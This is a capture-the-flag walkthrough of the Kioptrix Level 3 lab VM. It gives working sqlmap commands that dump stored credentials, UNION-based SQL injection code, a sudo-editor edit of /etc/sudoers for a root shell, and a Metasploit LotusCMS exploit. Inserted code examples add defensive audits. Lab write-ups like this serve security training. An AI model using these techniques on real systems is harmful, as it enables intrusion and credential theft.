KioptrixVM3

I. Information gathering

1. Discover the target IP on the local segment: sudo arp-scan -l
2. Port and service scan with nmap: nmap -T4 -A -v 192.168.65.136
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3. Web server scan with nikto: nikto -host 192.168.65.136
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2021-03-17 06:32:14 (GMT-4) (33 seconds)
4. Vulnerability scan with AWVS (Acunetix)
5. Browse the website by hand
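The header findings nikto reports above (PHPSESSID without HttpOnly, missing X-Frame-Options / X-Content-Type-Options / X-XSS-Protection, version disclosure, TRACE enabled) are easy to re-check by hand from a single captured response. The checker below is an added example, not code from the original write-up; SAMPLE_HEAD and SAMPLE_ALLOW are constructed to match what nmap and nikto showed for 192.168.65.136, with a made-up cookie value and Date.

```python
# Added example (not from the original write-up): re-check the header findings
# nikto reported against a captured response head, so they can be verified by
# hand rather than taken from the scanner. SAMPLE_HEAD is constructed to match
# what nmap and nikto showed for 192.168.65.136 (Apache 2.2.8, PHP 5.2.4-2ubuntu5.6,
# PHPSESSID set without HttpOnly); the cookie value and Date are made up.

SAMPLE_HEAD = """HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 10:31:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.6
Set-Cookie: PHPSESSID=0123456789abcdef; path=/
Content-Type: text/html
"""

# Allow header from an OPTIONS response; constructed so that TRACE appears,
# as nikto's OSVDB-877 finding claims.
SAMPLE_ALLOW = "GET,HEAD,POST,OPTIONS,TRACE"

# Headers nikto flagged as absent. X-XSS-Protection is still reported by
# nikto, but current browsers ignore it; the other two still matter.
EXPECTED_HEADERS = ("x-frame-options", "x-content-type-options", "x-xss-protection")


def parse_head(raw):
    """Split a raw response head into (name, value) pairs with lower-cased names.
    Repeated headers such as Set-Cookie stay as separate entries."""
    headers = []
    for line in raw.strip().splitlines()[1:]:   # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_head(raw, allow=None):
    """Return sorted finding tags for one response head.

    allow: the Allow value from an OPTIONS response, if one was captured."""
    headers = parse_head(raw)
    present = {name for name, _ in headers}
    findings = []

    # 'Cookie PHPSESSID created without the httponly flag': without HttpOnly,
    # script running in the page (for example via XSS) can read the session id.
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.lower() for p in parts[1:]}
        if "httponly" not in attrs:
            findings.append("cookie-missing-httponly:" + cookie_name)

    for required in EXPECTED_HEADERS:
        if required not in present:
            findings.append("missing-header:" + required)

    # Version strings in Server / X-Powered-By let an attacker pick exploits by
    # version, which is exactly how the outdated Apache and PHP were spotted.
    for name, value in headers:
        if name in ("server", "x-powered-by") and any(c.isdigit() for c in value):
            findings.append("version-disclosure:" + name)

    # Cross-site tracing (XST) is only possible if TRACE is really enabled.
    if allow and "trace" in {m.strip().lower() for m in allow.split(",")}:
        findings.append("trace-enabled")

    return sorted(findings)


if __name__ == "__main__":
    for tag in audit_head(SAMPLE_HEAD, SAMPLE_ALLOW):
        print(tag)
```

Note the discrepancy in the scan output: nmap's http-methods script listed only GET, HEAD, POST and OPTIONS, while nikto reports TRACE as active. Neither tool's word is final; send the request yourself with curl -i -X TRACE http://192.168.65.136/ and see whether the server echoes it back before writing up XST as a finding.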



II. Vulnerability discovery and exploitation

1. SQL injection in http://192.168.65.136/gallery/gallery.php?id=1
(1) Enumerate the databases with sqlmap (--batch accepts sqlmap's default answers so it runs unattended): sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 --dbs --batch
(2) List the tables in the gallery database: sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery --tables --batch
(3) List the columns of dev_accounts: sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts --columns --batch
(4) Dump the username and password columns: sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T dev_accounts -C username,password --dump --batch (sqlmap prints cracked hashes as hash (plaintext); only the recovered plaintexts are reproduced below)

+------------+------------+
| username   | password   |
+------------+------------+
| dreg       | (Mast3r)   |
| loneferret | (starwars) |
+------------+------------+

(5) List the columns of gallarific_users: sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns --batch
(6) Dump username and password from gallarific_users: sqlmap -u http://192.168.65.136/gallery/gallery.php?id=1 -D gallery -T gallarific_users -C username,password --dump --batch
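To see what sqlmap is actually doing against gallery.php?id=1, the following is an added example (not code from the original write-up or from the gallery application) that reproduces the vulnerable pattern and the two probes sqlmap relies on against an in-memory SQLite database: the boolean check that detects the injection, and the UNION-based extraction behind --dump. The table layout, the gallery rows and the stored password values are constructed from the dump above; the real target runs MySQL, and the column layout of its gallery table is an assumption. The hardened lookup next to it shows why type validation plus a bound parameter closes the hole.

```python
# Added example (not from the original write-up): the pattern behind
# gallery.php?id=1, reproduced against an in-memory SQLite database so the
# sqlmap steps above can be understood and replayed offline. Table layout and
# row contents are constructed from the dump shown above; the real target uses
# MySQL and the gallery table's real columns are an assumption.
import sqlite3


def build_gallery_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE gallery (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE dev_accounts (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO gallery VALUES (1, 'first photo'), (2, 'second photo');
        INSERT INTO dev_accounts VALUES (1, 'dreg', 'Mast3r'), (2, 'loneferret', 'starwars');
    """)
    return conn


def vulnerable_lookup(conn, id_param):
    # What a vulnerable gallery.php does: the query-string value is pasted
    # straight into the SQL text, so anything after the number is parsed as SQL.
    query = "SELECT id, title FROM gallery WHERE id=" + id_param
    return conn.execute(query).fetchall()


def safe_lookup(conn, id_param):
    # Hardened form: validate the type, then bind the value as a parameter.
    # A payload never reaches the SQL parser as SQL.
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM gallery WHERE id=?", (id_value,)).fetchall()


def is_injectable(lookup, conn):
    # The boolean-based probe sqlmap starts with: two requests that differ only
    # in a tautology versus a contradiction. Different results mean the
    # appended condition was evaluated by the database.
    return lookup(conn, "1 AND 1=1") != lookup(conn, "1 AND 1=2")


def dump_dev_accounts(lookup, conn):
    # UNION-based extraction, the mechanism behind '-T dev_accounts --dump':
    # the injected SELECT must return the same number of columns (2) as the
    # original query, and its rows come back inside the page's normal output.
    payload = "1 UNION ALL SELECT username, password FROM dev_accounts"
    rows = lookup(conn, payload)
    # Keep only the rows that came from dev_accounts (their first column is text).
    return [(u, p) for u, p in rows if isinstance(u, str)]


if __name__ == "__main__":
    db = build_gallery_db()
    print("vulnerable injectable:", is_injectable(vulnerable_lookup, db))
    print("safe injectable:      ", is_injectable(safe_lookup, db))
    print("dumped via injection: ", dump_dev_accounts(vulnerable_lookup, db))
```

The boolean probe is also the quickest manual confirmation before reaching for sqlmap: if gallery.php?id=1 AND 1=1 renders the photo and gallery.php?id=1 AND 1=2 does not, the parameter is injectable.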
2. Privilege escalation
(1) Since port 22 is open, try the credentials recovered by sqlmap over SSH: ssh admin@192.168.65.136
  • The admin login fails; log in as loneferret instead: ssh loneferret@192.168.65.136
  • loneferret logs in successfully, but the account is not root
(2) While looking at the files in the current directory, launching ht fails with Error opening terminal: xterm-256color (the attacker's terminal type is not in the target's terminfo database)
(3) Run export TERM=xterm-color, then open ht again with sudo ht (ht is an editor; with sudo it runs as root)
(4) With ht open as root, the goal is to edit /etc/sudoers and give the current account the right to run /bin/bash as root. Following the menu bar at the bottom of the screen, press F3 to open a file
(5) After F3, type /etc/sudoers and press Enter; at the end of the loneferret line append ,/bin/bash, press F2 to save, then quit ht (a syntax error in /etc/sudoers disables sudo for every user, so keep the edit to that one line)
(6) Now run sudo /bin/bash, and the shell is root
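The escalation above works because an editor running as root can rewrite /etc/sudoers, so "sudo ht" is already a root-equivalent grant before the ,/bin/bash edit. The audit below is an added example, not code from the original write-up: it parses sudoers-style lines, flags grants of root shells and root-run editors, and reproduces the edit from step (5). The sudoers text is constructed; the exact loneferret line on the VM and the path /usr/local/bin/ht are assumptions (run sudo -l on the target to see the real grants).

```python
# Added example (not from the original write-up): a small sudoers audit that
# shows why the 'sudo ht' entry was already root-equivalent, and what the edit
# made in step (5) looks like. SUDOERS_BEFORE is constructed; the real
# loneferret line and the path /usr/local/bin/ht are assumptions.
import re

# Binaries that hand over root outright or can rewrite any file as root.
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/su"}
EDITORS = {"ht", "vi", "vim", "nano", "less", "more"}

SUDOERS_BEFORE = """# constructed /etc/sudoers, not the file from the VM
Defaults env_reset
root    ALL=(ALL) ALL
loneferret ALL=(root) /usr/local/bin/ht
"""


def parse_sudoers(text):
    """Return (user, hosts, runas, [commands]) for each user specification.
    Defaults, comments and blank lines are skipped; the (runas) part is optional
    and defaults to root, as sudo itself does."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = re.match(r"^(\S+)\s+(\S+?)=(?:\((\S+)\))?\s*(.*)$", line)
        if not m:
            continue
        user, hosts, runas, cmds = m.groups()
        runas = (runas or "root").split(":")[0]       # drop a ':group' part
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        entries.append((user, hosts, runas, commands))
    return entries


def audit_sudoers(text):
    """Flag every non-root user who may run a shell or an editor as root."""
    findings = []
    for user, _hosts, runas, commands in parse_sudoers(text):
        if user == "root" or runas not in ("root", "ALL"):
            continue
        for cmd in commands:
            cmd = re.sub(r"^(NOPASSWD|PASSWD):\s*", "", cmd)   # strip tags
            binary = cmd.split()[0] if cmd else ""
            if binary in SHELLS or binary == "ALL":
                findings.append((user, binary, "direct root shell"))
            elif binary.rsplit("/", 1)[-1] in EDITORS:
                findings.append((user, binary, "root editor, can rewrite /etc/sudoers"))
    return findings


def grant_bash(text, user):
    """Reproduce the edit from step (5): append ',/bin/bash' to the user's line."""
    out = []
    for line in text.splitlines():
        if line.split() and line.split()[0] == user:
            line = line.rstrip() + ",/bin/bash"
        out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", audit_sudoers(SUDOERS_BEFORE))
    print("after: ", audit_sudoers(grant_bash(SUDOERS_BEFORE, "loneferret")))
```

From the defender's side the lesson is the same as the finding: any entry that lets a user run an editor, pager or interpreter as root is a root grant, whatever the file name suggests, and sudo -l is the first thing to run on any foothold.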
3. Another vulnerability: LotusCMS
(1) Search Metasploit for the LotusCMS module: search LotusCMS; point it at the target with set rhost 192.168.65.136 and at the application path with set uri /, then run show options to confirm the settings
(2) Run the exploit and catch the reverse shell